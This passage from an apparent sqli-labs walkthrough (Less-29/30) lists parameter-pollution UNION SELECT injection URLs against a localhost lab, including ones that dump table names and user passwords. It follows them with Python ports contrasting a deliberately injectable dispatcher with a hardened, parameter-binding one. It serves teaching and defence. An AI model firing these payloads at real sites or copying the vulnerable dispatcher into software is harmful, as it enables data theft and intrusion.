    foreach ($qs_array as $key => $value) {
        $val = substr($value, 0, 2);
        if ($val == "id") {
            $id_value = substr($value, 3, 30);
            return $id_value;
            break;
        }
    }
}
Solution:
http://localhost/sqli-lab/Less-30/login.php?id=1&id=" union select 1,2,3 --+
Others:
http://localhost/sqli-lab/Less-30/login.php?id=1&id=" union select 1,version(),database() --+
http://localhost/sqli-lab/Less-30/login.php?id=1&id=" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
http://localhost/sqli-lab/Less-30/login.php?id=1&id=" union select 1,group_concat(username),group_concat(password) from security.users where 1 --+
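Less 29 and 30 turn on a parser differential: the whitelist validates the first id in QUERY_STRING while $_GET['id'], and therefore the SQL, takes the last. As an added example (not the lab's code), here are Python ports of both parses beside a hardened dispatcher that parses once, refuses a duplicated parameter and binds the validated value; the two query strings are constructed, the second being a percent-encoded form of the page's Less 29 payload as a browser would send it.

```python
import re
from urllib.parse import parse_qsl

def waf_first_id(query_string):
    # Port of the page's java_implimentation(): walks the "&"-separated pairs and returns
    # the value of the FIRST pair whose first two characters are "id", without URL
    # decoding (note that a key such as "idx" would match as well).
    for pair in query_string.split("&"):
        if pair[:2] == "id":
            return pair[3:33]
    return None

def php_get_id(query_string):
    # PHP's $_GET keeps the LAST value of a repeated key, URL-decoded.
    value = None
    for key, val in parse_qsl(query_string, keep_blank_values=True):
        if key == "id":
            value = val
    return value

def is_numeric(value):
    # Same intent as preg_match("/^\d+$/"); re.fullmatch also rejects a trailing newline.
    return value is not None and re.fullmatch(r"\d+", value, flags=re.ASCII) is not None

def vulnerable_dispatch(query_string):
    # The page's flow: the whitelist judges one parse of the query string and the SQL is
    # built from another, so a polluted request passes the check with a different value.
    if not is_numeric(waf_first_id(query_string)):
        return ("redirect", "hacked.php")
    return ("query", f"SELECT * FROM users WHERE id='{php_get_id(query_string)}' LIMIT 0,1")

def hardened_dispatch(query_string):
    # Parse once, refuse a repeated parameter, validate the exact value that will be
    # used, and bind it as a parameter instead of interpolating it.
    ids = [val for key, val in parse_qsl(query_string, keep_blank_values=True) if key == "id"]
    if len(ids) != 1 or not is_numeric(ids[0]):
        return ("redirect", "hacked.php")
    return ("query", ("SELECT * FROM users WHERE id=? LIMIT 0,1", (int(ids[0]),)))

# Constructed query strings: the page's Less 30 probe, and its Less 29 payload as a
# browser would percent-encode it.
PROBE = "id=1&id=6"
POLLUTED = "id=1&id=%27%20union%20select%201,2,3%20--+"

if __name__ == "__main__":
    for qs in (PROBE, POLLUTED):
        print(repr(qs))
        print("  whitelist saw :", repr(waf_first_id(qs)))
        print("  $_GET['id']   :", repr(php_get_id(qs)))
        print("  vulnerable    :", vulnerable_dispatch(qs))
        print("  hardened      :", hardened_dispatch(qs))
```

The fix is not a better regex but validating the same value that reaches the query; refusing duplicated parameters removes the ambiguity entirely.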